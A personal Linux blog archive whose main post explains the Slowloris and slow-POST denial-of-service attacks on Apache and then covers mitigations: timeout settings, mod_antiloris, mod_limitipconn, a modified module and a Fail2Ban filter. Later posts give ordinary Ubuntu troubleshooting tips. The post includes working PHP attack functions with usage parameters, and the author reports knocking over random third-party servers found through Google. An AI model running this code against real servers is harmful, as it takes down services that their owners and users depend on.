
Wednesday, January 12, 2011

Slowloris And Mitigations For Apache

Introduction

If you are the least bit interested in network security, you'll undoubtedly have heard about Slowloris by now.
Slowloris is a piece of software written by Robert "RSnake" Hansen which allows a single machine to take down another machine's web server with minimal bandwidth and side effects on unrelated services and ports. Slowloris tries to keep many connections to the target web server open and hold them open as long as possible. It accomplishes this by opening connections to the target web server and sending a partial request. Periodically, it will send subsequent HTTP headers, adding to—but never completing—the request. Affected servers will keep these connections open, filling their maximum concurrent connection pool, eventually denying additional connection attempts from clients. (From: Wikipedia)
The attack is HTTP-based, and attacks webservers by making lots of keep-alive connections and keeping them alive by sending bogus HTTP headers. The server's connection pool gets filled and no other clients can be served. The attack is said to work on a large number of webservers, according to the project page:
  • Apache 1.x
  • Apache 2.x
  • dhttpd
  • GoAhead WebServer
  • WebSense "block pages" (unconfirmed)
  • Trapeze Wireless Web Portal (unconfirmed)
  • Verizon's MI424-WR FIOS Cable modem (unconfirmed)
  • Verizon's Motorola Set-Top Box (port 8082 and requires auth - unconfirmed)
  • BeeWare WAF (unconfirmed)
  • Deny All WAF (unconfirmed)
And does not affect:
  • IIS6.0
  • IIS7.0
  • lighttpd
  • Squid
  • nginx
  • Cherokee (verified by user community)
  • Netscaler
  • Cisco CSS (verified by user community)
Recently, the method was placed in the spotlight again, because both Wikileaks supporters and non-supporters were using it to DOS a variety of websites and Wikileaks mirrors. Also, recently, an alternative HTTP-based DOS method was found, using POST requests with a large content length (article).

Attack

I run Apache, so, naturally, I was (and still am) concerned about this attack vector. The first step in preventing and solving security problems lies in understanding the attack. Luckily, in this case, the attack is devilishly simple. Based on a PHP version of the original Slowloris attack (found here), I wrote a modified script which also included the new POST-based attack method. The extended version of the script can be found on Github.

The usage is straightforward:

./scriptname.php <method> <number of processes> <server> [host]

Where:
  • <method> is either "get" for the "slow-headers" based attack, or "post" for the new variant;
  • <number of processes> determines the number of concurrent requests, around 300 does the trick in most cases;
  • <server> is the hostname or IP address of the server you want to target;
  • [host] is an optional parameter which will be used in the "Host:" request header. If left blank, the same value as <server> will be used.

The script really illustrates how simple the attacks are. Let's comment a bit on the attack_get function:
function attack_get($server, $host){
    # The following lines set up a normal HTTP1.1 GET request with Keep-Alive
    $request  = "GET / HTTP/1.1\r\n";
    $request .= "Host: $host\r\n";
    # Spoof User-Agent (can be changed)
    $request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
    # The following header is, strictly speaking, not necessary, all HTTP1.1 requests are kept alive
    $request .= "Keep-Alive: 900\r\n";
    # Just make the Content-Length large enough
    $request .= "Content-Length: " . rand(10000, 1000000) . "\r\n";
    $request .= "Accept: *.*\r\n";
    # First custom header, name can be changed
    $request .= "X-a: " . rand(1, 10000) . "\r\n";

    # Open socket to webserver and send request
    $sockfd = @fsockopen($server, 80, $errno, $errstr);
    @fwrite($sockfd, $request);

    while (true){
        # Try adding another bogus header
        if (@fwrite($sockfd, "X-c:" . rand(1, 100000) . "\r\n")){
            # Sleep for a bit
            sleep(15);
        }else{
            # Sending failed
        }
    }
}

The attack_post function works very similarly:
function attack_post($server, $host){
    # Send a post request to a random location, eventually you could change this to make sure you post to an existing URL
    $request  = "POST /".md5(rand())." HTTP/1.1\r\n";
    $request .= "Host: $host\r\n";
    $request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
    $request .= "Keep-Alive: 900\r\n";
    # "Prepare yourself webserver, we're going to send a lot here, ready?"
    $request .= "Content-Length: 1000000000\r\n";
    $request .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $request .= "Accept: *.*\r\n";

    $sockfd = @fsockopen($server, 80, $errno, $errstr);
    @fwrite($sockfd, $request);

    while (true){
        # Send a small bit of content
        if (@fwrite($sockfd, ".") !== FALSE){
            # Sleep for a bit, pretend that "We're a terribly slow browser, so sorry..."
            sleep(1);
        }else{
            # Sending failed
        }
    }
}

You can also download an OWASP (Open Web Application Security Project) tool found here which does the same. The tool contains a GUI which lets you choose the attack method (slow headers or slow post), has proxy support, and allows setting attack parameters. The slow header attack can use GET or POST requests, whereas my script above cannot and only uses GET. Not that it matters much for that method, as the headers are the crucial factor.

The attack certainly works. In my testing, I was able to DOS about 30% of all sampled webservers (retrieved from just random Google results), including my own. A funny side effect of this method is that, once you stop attacking, the server immediately becomes responsive again as the connection pool is freed. The slow post attack worked more reliably in my testing than the slow headers.

Mitigation

Preventing the attack is not easy. The Apache developers are aware of the problem, but some architectural changes are needed before the problem will be solved. In the meantime, some users have made some suggestions and/or developed solutions themselves:
  • Using Apache modules such as mod_limitipconn, mod_qos, mod_evasive, mod_security, mod_noloris, and mod_antiloris.
  • Making some changes to Apache configuration.
  • Using load balancers or proxies. Setting up Varnish in front of Apache seems to be a popular choice.
  • Using IPTABLES to block a lot of simultaneous requests from the same IP.
  • Using Fail2Ban or similar software to ban IPs based on log data.
  • Making changes to Linux/FreeBSD network parameters using accf, pfctl, sysctl
Since I want to try to keep things simple, I'll look at the Apache configuration, and some helpful modules.

Apache Configuration

This mainly concerns tuning the following: KeepAliveTimeout and Timeout.
Timeout does the following (docs):
The TimeOut directive defines the length of time Apache will wait for I/O in various circumstances:
When reading data from the client, the length of time to wait for a TCP packet to arrive if the read buffer is empty.
When writing data to the client, the length of time to wait for an acknowledgement of a packet if the send buffer is full.
This helps a bit, but an attacker could just increase his own sending rate (e.g. lower the sleep time in the functions above) to work around this.

KeepAliveTimeout then does:
The number of seconds Apache will wait for a subsequent request before closing the connection.
Again, the problem remains. An attacker could just increase the sending rate. Note that, when using the slow headers method, the Timeout directive above might not help a single bit, since the docs state that:
Once a request has been received, the timeout value specified by the Timeout directive applies.
But the full receiving of a request itself takes a long, long time.

Turning KeepAlive completely off might help, but it is no real remedy. The POST attack still remains an issue. Tweaking with the Apache options alone is thus certainly not enough.

mod_antiloris

Some developers have released Apache modules geared to mitigate the Slowloris attack. The two most common ones are mod_antiloris and mod_noloris. Both use the same trick to prevent attacks. They both hook into connection attempts:

ap_hook_process_connection(pre_connection, NULL, NULL, APR_HOOK_FIRST);

And count how many connections from the same remote IP are already in the SERVER_BUSY_READ state (the server is reading data from a client). When this count is too high, subsequent connections get denied:

for (i = 0; i < server_limit; ++i) {
    for (j = 0; j < thread_limit; ++j) {
        ws_record = ap_get_scoreboard_worker(i, j);
        switch (ws_record->status) {
            case SERVER_BUSY_READ:
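                /* Count only workers serving this client; this is the
                 * counter compared against read_limit below */
                if (strcmp(client_ip, ws_record->client) == 0)
                    ip_read_count++;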
                break;
            default:
                break;
        }
    }
}

if (ip_read_count > conf->read_limit) {
    ap_log_error(APLOG_MARK, APLOG_WARNING, 0, NULL, "[client %s] rejected, too many connections in READ state", c->remote_ip);
    return OK;
} else {
    return DECLINED;
}

Installing mod_antiloris in Ubuntu is a simple matter of executing:

$ sudo apt-get install libapache2-mod-antiloris

mod_limitipconn

During testing, I discovered that the mod_antiloris module above only protects against the original slow header variant of the Slowloris attack. The slow post was still killing my webserver. So I explored the use of another mod, named mod_limitipconn, which limits simultaneous requests from the same IP.

There is no Apache2 module of mod_limitipconn in the Ubuntu repositories, but a Debian deb package is available online and works fine on Ubuntu:
# Use the i386 package if you have to...
$ wget http://elonen.iki.fi/code/unofficial-debs/mod-limitipconn/apache2-mod-limitipconn_0.22-2_amd64.deb
$ sudo dpkg -i ./apache2-mod-limitipconn_0.22-2_amd64.deb
$ sudo a2enmod limitipconn

Before you restart Apache, create a configuration file at /etc/apache2/conf.d/limitipconn.conf:
ExtendedStatus On
<IfModule mod_limitipconn.c>
        <Location />
                # Global settings here
                MaxConnPerIP 10
                # No limit for images
                NoIPLimit image/*
        </Location>
</IfModule>

Now the server can be restarted:

$ sudo /etc/init.d/apache2 restart

When investigating the source code of mod_limitipconn, we find the following lines:
/* Count up the number of connections we are handling right now from
* this IP address */
for (i = 0; i < server_limit; ++i) {
    for (j = 0; j < thread_limit; ++j) {
        ws_record = ap_get_scoreboard_worker(i, j);
        switch (ws_record->status) {
            case SERVER_BUSY_READ:
            case SERVER_BUSY_WRITE:
            case SERVER_BUSY_KEEPALIVE:
            case SERVER_BUSY_LOG:
            case SERVER_BUSY_DNS:
            case SERVER_CLOSING:
            case SERVER_GRACEFUL:
                if (strcmp(address, ws_record->client) == 0)
                    ip_count++;
                break;
            default:
                break;
        }
    }
}

Not much different compared to the previous mods, except that mod_limitipconn takes into account all possible server states. Not surprisingly, the attack stopped working after installing this mod. You can disable mod_antiloris when using this module. One might wonder which state actually protects against the slow post attack variant. One would expect SERVER_BUSY_READ to intercept these as well, as the server is, in fact, still reading a request from the client and waiting for it to complete. However, as it turns out, the server actually switches to the SERVER_BUSY_WRITE state when receiving a POST, as described on the mailing lists:
However, there is a real problem with all approaches that look for SERVER_BUSY_READ: The attacker can just use a URL that accepts POST requests and send the request body very slowly. These connections have the state SERVER_BUSY_WRITE. This problem affects mod_antiloris and mod_noloris, too (but not mod_reqtimeout). Maybe another state SERVER_BUSY_READ_BODY could be introduced? Or the state could be changed to SERVER_BUSY_READ again when the request body is read?
Interesting information, and some valid points.

Modified mod_antiloris

With this in mind I set out to modify mod_antiloris, as I wasn't completely happy with mod_limitipconn. The module works great, but provided too much configuration overhead. I wanted something really simple. The source code for mod_antiloris was quickly edited to include a second counter, and to check the request string (i.e. it has to contain "POST").
switch (ws_record->status) {
    case SERVER_BUSY_READ:
        if (strcmp(client_ip, ws_record->client) == 0){
            ip_read_count++;
        }
        break;
    case SERVER_BUSY_WRITE:
        if (NULL != strstr(ws_record->request, str_post) && strcmp(client_ip, ws_record->client) == 0){
            ip_write_count++;
        }
        break;
    default:
        break;
}


I also modified the logging to look a bit more like normal Apache error lines. This will come into play in the next step. The full modified source code is available on Github.

Installing and compiling the module requires little work:
$ sudo apt-get install gcc apache2-threaded-dev
$ wget https://gist.github.com/raw/773464/4e7250692c34f55725384525b513e71be7541f5a/mod_muantiloris.c
$ sudo apxs2 -a -i -c mod_muantiloris.c
$ sudo /etc/init.d/apache2 restart

Don't forget to disable mod_antiloris and/or mod_limitipconn if you have them enabled (using a2dismod). The modified module uses only two optional configuration directives:

IPReadLimit (default 5)
IPPostLimit (default 10)


Note: just as with mod_limitipconn, the ExtendedStatus directive should be set to On for this module to work!

The module blocks both attack variants, and logs to error.log like so:

[Tue Jan 11 00:11:35 2011] [warn] [client 0.0.0.0] Antiloris rejected, too many connections in READ state

Mission successful!
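
The three per-IP counting policies discussed above, run against a constructed scoreboard snapshot. This is an added example, not code from mod_antiloris, mod_limitipconn or the modified module. The `Worker` record, the state names as strings and the sample addresses are assumptions; the limits are the values quoted on this page (IPReadLimit 5, IPPostLimit 10, MaxConnPerIP 10).

```python
from collections import namedtuple

# Simplified stand-in for one Apache scoreboard slot (constructed model):
# worker status, client IP, and the request line kept when ExtendedStatus is On.
Worker = namedtuple("Worker", "status client request")

# States counted by mod_limitipconn, per the excerpt on this page.
ALL_BUSY = {"BUSY_READ", "BUSY_WRITE", "BUSY_KEEPALIVE", "BUSY_LOG",
            "BUSY_DNS", "CLOSING", "GRACEFUL"}


def antiloris(board, ip, read_limit=5):
    """Original mod_antiloris idea: count only READ-state slots for this IP."""
    reads = sum(1 for w in board if w.client == ip and w.status == "BUSY_READ")
    return "reject" if reads > read_limit else "accept"


def limitipconn(board, ip, max_conn=10):
    """mod_limitipconn idea: count every busy slot (NoIPLimit is not modelled)."""
    busy = sum(1 for w in board if w.client == ip and w.status in ALL_BUSY)
    return "reject" if busy > max_conn else "accept"


def modified_antiloris(board, ip, read_limit=5, post_limit=10):
    """Modified module: READ slots, plus WRITE slots whose request contains POST."""
    reads = writes = 0
    for w in board:
        if w.client != ip:
            continue
        if w.status == "BUSY_READ":
            reads += 1
        elif w.status == "BUSY_WRITE" and "POST" in w.request:
            writes += 1
    if reads > read_limit:
        return "reject (READ)"
    if writes > post_limit:
        return "reject (POST in WRITE)"
    return "accept"


def build_board():
    """Constructed sample: two slow clients and one busy but legitimate browser."""
    board = []
    # Slow headers: the request never completes, so workers stay in READ.
    board += [Worker("BUSY_READ", "203.0.113.5", "")] * 20
    # Slow POST: headers are complete, the body trickles in, workers show WRITE.
    board += [Worker("BUSY_WRITE", "203.0.113.9", "POST /form HTTP/1.1")] * 20
    # Browser fetching many assets in parallel.
    board += [Worker("BUSY_WRITE", "198.51.100.7", "GET /img/a.png HTTP/1.1")] * 8
    board += [Worker("BUSY_KEEPALIVE", "198.51.100.7", "GET /css/s.css HTTP/1.1")] * 4
    board += [Worker("READY", "", "")] * 10
    return board


def compare(board):
    """Return {ip: (antiloris, limitipconn, modified)} for every client on the board."""
    clients = sorted({w.client for w in board if w.client})
    return {ip: (antiloris(board, ip), limitipconn(board, ip),
                 modified_antiloris(board, ip)) for ip in clients}


if __name__ == "__main__":
    for ip, verdicts in compare(build_board()).items():
        print(ip, *verdicts, sep="  |  ")
```

The READ-only check accepts the slow-POST client because none of its slots are in the READ state, while the all-states count also rejects the browser with twelve parallel connections.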

Fail2Ban

The following step is optional and only recommended if you already have Fail2Ban installed and running. Fail2Ban is a handy tool to ban IPs based on regex tests on logfiles. (I've caught dozens of Chinese, Brazilian and Russian trespassers already.)

I use the following filter in combination with the modified mod_antiloris above:
[Definition]

# Option:  failregex
# Notes.:  regex to match the password failure messages in the logfile. The
#          host must be matched by a group named "host". The tag "<HOST>" can
#          be used for standard IP/hostname matching and is only an alias for
#          (?:::f{4,6}:)?(?P<host>[\w\-.^_]+)
# Values:  TEXT
#
failregex = [[]client <HOST>[]] Antiloris rejected, too many \(POST\) connections in WRITE state
            [[]client <HOST>[]] Antiloris rejected, too many connections in READ state

# Option:  ignoreregex
# Notes.:  regex to ignore. If this regex matches, the line is ignored.
# Values:  TEXT
#
ignoreregex =

I do set the bantime to a low value and maxretry parameter to a high amount however, as the module tends to generate a lot of error lines and legitimate, aggressive browsers sometimes like to make a lot of concurrent requests as well (mod_limitipconn did have the added benefit of specifying mime type to ignore, although its recognition is based on a reduced URI request string from the Apache scoreboard). Fail2Ban uses IPTables, which has the added benefit that once an IP is banned, Apache can stop dealing with its flooding altogether.
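
A quick way to check the filter before relying on it: the two failregex lines expanded the way the filter's comment describes and run over constructed error.log lines. This is an added example, not part of Fail2Ban or of the original post. The sample log lines, the addresses and the maxretry values are constructed, and the `<HOST>` expansion is assumed to be the alias documented in the filter comment above.

```python
import re
import warnings
from collections import Counter

# Alias substituted for the <HOST> tag, as documented in the filter comment
# (assumption: matches the Fail2Ban generation this filter was written for).
HOST_ALIAS = r"(?:::f{4,6}:)?(?P<host>[\w\-.^_]+)"

FAILREGEX = [
    r"[[]client <HOST>[]] Antiloris rejected, too many \(POST\) connections in WRITE state",
    r"[[]client <HOST>[]] Antiloris rejected, too many connections in READ state",
]

# Constructed sample lines in the format the modified module logs.
SAMPLE_LOG = [
    "[Tue Jan 11 00:11:35 2011] [warn] [client 203.0.113.5] Antiloris rejected, too many connections in READ state",
    "[Tue Jan 11 00:11:36 2011] [warn] [client 203.0.113.9] Antiloris rejected, too many (POST) connections in WRITE state",
    "[Tue Jan 11 00:11:37 2011] [error] [client 198.51.100.7] File does not exist: /var/www/favicon.ico",
    "[Tue Jan 11 00:11:38 2011] [warn] [client 203.0.113.5] Antiloris rejected, too many connections in READ state",
    "[Tue Jan 11 00:11:39 2011] [warn] [client ::ffff:203.0.113.9] Antiloris rejected, too many (POST) connections in WRITE state",
    "[Tue Jan 11 00:11:40 2011] [warn] [client 203.0.113.5] Antiloris rejected, too many connections in READ state",
]


def compile_failregex(pattern):
    """Expand <HOST> and insist on a 'host' group, as the filter comment requires."""
    expanded = pattern.replace("<HOST>", HOST_ALIAS)  # the tag is case-sensitive
    with warnings.catch_warnings():
        # "[[]" is a valid one-character class, but newer Python versions
        # emit a FutureWarning ("possible nested set") when compiling it.
        warnings.simplefilter("ignore", FutureWarning)
        rx = re.compile(expanded)
    if "host" not in rx.groupindex:
        raise ValueError("no 'host' group in failregex: %r" % pattern)
    return rx


def failures(lines, patterns=FAILREGEX):
    """Count matching lines per host; the first matching pattern wins."""
    compiled = [compile_failregex(p) for p in patterns]
    hits = Counter()
    for line in lines:
        for rx in compiled:
            m = rx.search(line)
            if m:
                hits[m.group("host")] += 1
                break
    return hits


def would_ban(lines, maxretry):
    """Hosts reaching maxretry (simplified: the findtime window is ignored)."""
    return sorted(h for h, n in failures(lines).items() if n >= maxretry)


if __name__ == "__main__":
    print(dict(failures(SAMPLE_LOG)))
    print(would_ban(SAMPLE_LOG, maxretry=3))
```

A filter written with a lowercase `<host>` tag is left unexpanded and fails the group check, which is worth testing whenever a filter has been copied from a web page.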


That concludes this blog post. I hope you've found the material helpful. Feel free to use any code here and on Github as you see fit.

Tuesday, April 28, 2009

Ubuntu Jaunty: Skype Worked Before, Now: "Problem with audio capture"

There are two things I currently do not like about Ubuntu or Linux in general: the whole sound mess, and the whole graphics mess (but both are getting better). This problem is about the first mess.

Skype was working perfectly in Intrepid, now in Jaunty it was telling me that there was a "Problem with audio capture". I tested Ubuntu's sound-recorder as well, which was not working either.

I'm using the default, normal Skype from the Medibuntu repos!

Let's take a look at all the different factors here. First of all, open System → Preferences → Sound. Mine looks like this:
  • Sound Events - Sound playback: Autodetect
  • Music and Movies - Sound playback: Autodetect
  • Audio Conferencing
    • Sound playback: Autodetect
    • Sound capture: ALSA - Advanced Linux Sound Architecture, in your case, this may say PulseAudio Sound Server here. However, I have noticed that ALSA seems to record better sound (less garbled, especially with slower computers). Since we're not doing anything unusual with recorded sound (client-server, multiple inputs), I suggest you also pick ALSA here.
Now right click the sound icon in the panel and pick "Open Volume Control". My device says "HDA Intel (Alsa mixer)". You'll probably need the Alsa mixer as well. I have a few sliders I have to play with:
  • In the Playback-tab (yes, here!): Mic Boost
  • In the Recording-tab: Capture
  • In the Switches-tab: make sure Microphone Capture is enabled! This was disabled after my Jaunty upgrade. If you're not seeing any relevant sliders or checkboxes, click the Preferences-button and enable all relevant sliders/switches.
Now open sound-recorder. You should be able to record sound now. Also, start pavucontrol, and click the Input Devices-tab, the level meter should respond to you clapping your hands for example.

Hear yourself? No, then try fiddling again with the settings in the previously opened windows before you continue!

Yes, good, onwards to Skype. Try making a test call. In my case, Skype was still complaining about the audio capture. Let's open Skype's options → Sound Devices.

In my case, the options were:
  • Sound In: HDA Intel (hw:Intel,0)
  • Sound Out: pulse
  • Ringing: pulse
Which was working in Intrepid. If you suffer the same problem, read on...

A sidenote, your Sound In device might be either pulse or default as well. There are a few cases when you should use these:
  • default: if you've successfully changed configuration files to make the correct devices the default ones. This will almost never be the case.
  • pulse: if you're using PulseAudio server for the Sound Capture. But even then, I don't recommend it. Using pulse for Sound In often crashes Skype on my machine...
Again, this holds provided you use a normal Skype (non-static, non-OSS).
Your Sound Out/Ringing devices are already correct, they need to be pulse. Sound In will be set to an hw-device.

Before reading further, try making a test call with every listed hw-device (I had four, you can have more or less).

If none of them are working or if you're sure which hw-device you need (and it isn't working), try this: edit /etc/pulse/daemon.conf (don't forget to sudo) and make sure the following lines are present and uncommented, with the following values:

default-fragments = 8
default-fragment-size-msec = 5

This is an optional step, but it seems to help with the Skype sound quality (another option is setting default-fragment-size-msec to 10).

(!) Now, edit ~/.asoundrc (no need to be root here, it's a file in your home directory) and make sure the following lines are there:

pcm.pulse { type pulse }
ctl.pulse { type pulse }

Which I totally did in Hardy as well! The update must've deleted them. This simple file seemed to do the trick!

Then, just to be sure, I reinstalled the libasound2-plugins package.

Reboot, or restart pulseaudio (kill it, then start it in e.g. a Terminal window). Restart Skype. Skype was working fine now. If it is not, make sure you try every plughw-device.



Still not working, no matter how much you try? You're out of luck. If sound-recorder and sound playback are working, you can try an emergency solution. Install the static, OSS version of Skype (you can find it with Medibuntu or floating around in a tarball somewhere) and start it with:

padsp skype

To route the sounds through the PulseAudio sink. Sound devices in this Skype should all be set to default (or OSS). Calls should work now. Be warned though: always try this as a last resort, routing OSS sound through PulseAudio is slow and bloated, ugly and old. Your recorded voice will sound like... well, crap.

Vice City (And Perhaps Other Games) In Wine - CD Error With ISO

So, you've just gotten yourself two .iso's for Grand Theft Auto: Vice City (your backups, of course), which you want to play in Wine. What do you do?

That's easy, you say:
sudo mkdir /media/isoimage
sudo mount -o loop ./cd1.iso /media/isoimage

And start the setup with Wine.

Now the installer asks for the second CD, what do you do? Here we have to "eject" our "cd" first...

wine eject
sudo umount /media/isoimage
sudo mount -o loop ./cd2.iso /media/isoimage

And we're done. You want to start the game, but it requires the play disk, even though you're sure you've mounted it. Thing is, Vice City isn't looking at your /media/isoimage mount point, but it's looking at your drive letters... where could the cd be?

Take a look in ~/.wine/dosdevices (it's a hidden directory in your home folder). We're going to create two symbolic links there (in my case, there were a lot of symbolic, broken links already there, I deleted every one of them except c: and z:). One for the mount point, and one for the actual device (or in our case: the image).

ln -sf /media/isoimage ~/.wine/dosdevices/e:
ln -sf ~/cd2.iso ~/.wine/dosdevices/e::

Note the double colons (e::) in the second line. That's it, the game should start fine now.

Be sure to replace /media/isoimage, e:, e::, ~/cd1.iso, ~/cd2.iso and other displayed paths/locations with the ones relevant for you.

Friday, January 16, 2009

Nokia N95, 3G, Bluetooth, And Ubuntu Intrepid - 3G Tethering Howto

The following steps are instructions to surf the web using a Nokia N95 with 3G, connected to your Intrepid laptop via Bluetooth.

1. Make sure you have the required packages installed:

sudo apt-get install bluez-utils bluez-pin ppp

2. Find out the phone's MAC address. Enable Bluetooth on phone and laptop, and enter the following command:

hcitool scan

Output example:
$ hcitool scan
Scanning ...
00:1C:9A:26:F5:DD Macuyiko N95

Note the MAC address of your phone.

3. Find out the phone's channel, with the N95, this might change from time to time:

sdptool search --bdaddr MAC DUN | grep Channel

Replace MAC with your phone's MAC address.

Output example:
$ sudo sdptool search --bdaddr 00:1C:9A:26:F5:DD DUN | grep Channel
Channel: 4

Note this channel.

4. Edit /etc/ppp/peers/BluetoothDialup:

sudo gedit /etc/ppp/peers/BluetoothDialup

Paste the following:
/dev/rfcomm1 115200
local
nocrtscts
connect "/usr/sbin/chat -v -f /etc/chatscripts/proximus-gprs"
noauth
defaultroute
usepeerdns
novj
remotename proximus
debug
#user
lcp-restart 5
ms-dns 195.238.2.21

There are a few lines which you might need to change. I'm using the Belgian Proximus operator.

First of all, change /etc/chatscripts/proximus-gprs to something more related to your provider (e.g.: /etc/chatscripts/myprovider-gprs). We're going to create this script in the next step. Also: you might need to change the ms-dns entry as well (in most cases you can leave it out, but I had to add it though). Also notice that I have used /dev/rfcomm1 as the used device, we'll use this in the next steps as well.

5. Create a chatscript at /etc/chatscripts/proximus-gprs

sudo gedit /etc/chatscripts/proximus-gprs

Note that you may have chosen a different name for your chatscript in the previous step. Paste:
ABORT BUSY
ABORT 'NO CARRIER'
ABORT VOICE
ABORT 'NO DIALTONE'
ABORT 'NO DIAL TONE'
ABORT 'NO ANSWER'
"" ATZ
OK AT+CGDCONT=1,"IP","internet.proximus.be"
OK ATDT*99#
CONNECT ""

The APN (internet.proximus.be) and the data profile number line (ATDT*99#) are the entries you need to change for your provider. Look up your APN and data profile number. If you google for "APN 3g [yourprovider]" you will often find the correct results, or look here for APNs for many providers. The data profile number line will often be OK ATDT*99# or OK ATDT*99***1#, so try them both.

6. Try it out

Enter the following command:

rfcomm connect RFCOMM# MAC CHANNEL

Replace RFCOMM# with the /dev/rfcomm-number you've used before (only the number!), I've used 1. MAC is your phone's MAC address again, and CHANNEL is the channel you found earlier.

If all went well it should say:
$ rfcomm connect 1 00:1C:9A:26:F5:DD 4
Connected /dev/rfcomm1 to 00:1C:9A:26:F5:DD on channel 4
Press CTRL-C for hangup

Now we're going to enable the PPP connection, in a new terminal window (keep the "CTRL-C for hangup"-one open), enter:

pon BluetoothDialup

BluetoothDialup is the filename of the file we have created in /etc/ppp/peers/ earlier in step 4.

If all went well you should see an entry now in your ifconfig output:
$ ifconfig
ppp0      Link encap:Point-to-Point Protocol
          inet addr:81.169.31.99  P-t-P:10.6.6.6  Mask:255.255.255.255
          UP POINTOPOINT RUNNING NOARP MULTICAST  MTU:1500  Metric:1
          RX packets:3 errors:0 dropped:0 overruns:0 frame:0
          TX packets:4 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:3
          RX bytes:54 (54.0 B)  TX bytes:69 (69.0 B)

If you're done surfing the internet, turn off PPP:

poff

Press CTRL-C in that other terminal window to break the Bluetooth/3G-connection.

Note: if you've done something wrong (e.g.: used the wrong channel), you can release rfcomm's with:
rfcomm release RFCOMM#

With RFCOMM# equal to the /dev/rfcomm-number you've used before.

Optional steps: use gnome-ppp to connect

If you have gnome-ppp installed, you can also use a graphical interface to configure the above steps.

First of all, you still have to execute:

rfcomm connect RFCOMM# MAC CHANNEL

But you don't have to create the files from steps 4 and 5. We could automate the connect-step as well, but since the N95's channel changes from time to time, this wouldn't be very convenient. Also, I like having a terminal open to notify me that I'm still surfing via my phone.

Then open up gnome-ppp. If you have to enter a blank username and password for your provider, just enter some dummy values. I used "blank" and "blank" :).

Phone number: I tried *99***1# this time. And it also seemed to work, great!

Then press Setup. Enter the following values:
  • Device: /dev/rfcomm1 (or the other rfcomm you defined earlier)
  • Type: USB Modem (yes, USB!)
  • Speed: 460800 works here, this probably means I could have used this value in the previous configuration files as well, instead of 115200
  • Phone Line: Tone (default)
  • Volume: High (default)
Then press Init Strings.
  • Leave Init 2 unchanged (ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0)
  • Enter this in Init 3: AT+CGDCONT=1,"IP","internet.proximus.be"
    Again, change this for your provider! I also had to manually define a DNS in the Networking tab, just like in the previous steps. This might not be the case for you.
You're done, make sure you're not wired or wirelessly connected to test this :).


Final note: some people have to add novj to /etc/ppp/options as well. I didn't, tho. Check the Ubuntu forums/Google for information about your specific operator and/or hardware.

These instructions were only tested with my Thinkpad, my N95, and my operator. I've set up laptops with Vodafone cards before, and you can use gnome-ppp for those as well, just make sure you're using the correct device. Often the device will be at /dev/ttyS0, but use dmesg to find out the exact location.

Friday, June 27, 2008

Is w32codecs Freezing Your Ubuntu?

Wanted to play a RealMedia file? Installed w32codecs? Now Totem is freezing your Ubuntu Hardy? And by freezing, I mean: you can move the mouse, nothing else works, no ctrl-alt-backspace, no ctrl-alt-F1.

Then do the following:
  1. Make sure you have gstreamer0.10-pitfdll installed.
  2. Install (if you haven't already) w32codecs.
  3. Execute the following three commands in the terminal:
    rm -rf ~/.gstreamer-0.10
    gst-inspect-0.10
    gst-inspect-0.10 pitfdll
  4. Try Totem again. Should work now.

Monday, April 30, 2007

Ubuntu Feisty - Second Problem

Another problem (on another machine) was that it refused booting the new kernel.

Also: the live cd didn't work either, with the same error. A lot of people have problems of this kind, and most of the time they get the following errors:

ata2 is slow to respond, please be patient
ata2 failed to respond (30 secs)
ata2: command 0xa0 timeout, stat 0xd0 host_stat 0x20

And finally it quits to an initramfs shell:

/bin/sh: can't access tty; job control turned off

Note that this last message is normal and has nothing to do with the actual problem. This caused some confusion with some people.

So people have tried various things, here are a few suggestions, most of them came from users and developers:
  • Is there a floppy in the drive? Remove it, otherwise, insert a floppy and see if that makes any difference. I didn't care much for this solution. However, it did work for some people...
  • Check your IDE configuration in the BIOS, put it on Standard IDE.
  • Boot with libata.ignore_hpa=0 added to boot options. (Press e to edit a menu item in the GRUB list, then go to the line which contains the kernel. Always remove quiet and splash and add the above command.) This didn't work for me.
  • The solution which worked for me was the following one: add break=top to the boot parameters (see above), don't forget to delete splash and quiet. Once you boot, you will immediately break to an initramfs shell. Try the following commands.
    modprobe piix
    modprobe libata
    modprobe pata_jmicron
    modprobe ata_piix
    modprobe ahci
    modprobe ata_generic
    modprobe ide-disk
    modprobe ide-generic
    Then type exit to continue booting. You don't have to try them all at once. I first tried ide-disk and ide-generic but those didn't work, then I tried only piix, which worked! If that doesn't work, I would suggest trying piix, libata, pata_jmicron, ata_piix, ahci and ata_generic.
    Once you get it running, we must make sure these modules get loaded automatically (instead of always adding break=top). Edit the following file: /etc/initramfs-tools/modules. E.g., type:
    sudo gedit /etc/initramfs-tools/modules
    And add the modules which worked for you (without modprobe). In my case, I only had to add piix. Save and exit the editor, then execute the following command:
    sudo update-initramfs -u
    Done. Try to restart normally. It should work now. If it doesn't, continue checking the forums and Launchpad.

Feisty Upgrade - First Problem

We recently updated all our Ubuntu machines from Edgy to Feisty. Updating went smoothly, apart from a few problems.

The first problem was that X was freezing at random intervals. Xorg log said nothing special, but the GDM log did:

Error in I830WaitLpRing(), now is 7023360, start is 7021359
pgetbl_ctl: 0x3ffc0001 pgetbl_err: 0x0
ipeir: 0 iphdr: 1810000
LP ring tail: 9b38 head: 938c len: 1f801 start 0
eir: 0 esr: 0 emr: ffff
instdone: ffc0 instpm: 0
memmode: 306 instps: f0000
hwstam: ffff ier: 0 imr: ffff iir: 0
space: 129100 wanted 131064

Fatal server error:
lockup

So I did the only thing I could think of: I removed the Videoram lines from xorg.conf. And the freezes seem to have stopped.

Thursday, October 26, 2006

Finished

Just updated to Edgy and installed Beryl following these instructions.

Added these to my sources:

deb http://www.beerorkid.com/compiz edgy main-edgy
deb http://media.blutkind.org/xgl/ edgy main-edgy
deb http://compiz-mirror.lupine.me.uk/ edgy main-edgy
deb http://ubuntu.compiz.net/ edgy main-edgy

Then:

sudo apt-get update

Since I use an Intel card:

Add to Section "Device":

Option "XAANoOffscreenPixmaps" "true"

And at the end of the file:

Section "Extensions"
Option "Composite" "true"
EndSection

In /etc/X11/xorg.conf.

Then install Beryl:

sudo apt-get install beryl-core beryl-plugins beryl-plugins-data emerald beryl-settings beryl-manager beryl beryl-dev emerald-themes

Then just start with beryl-manager.

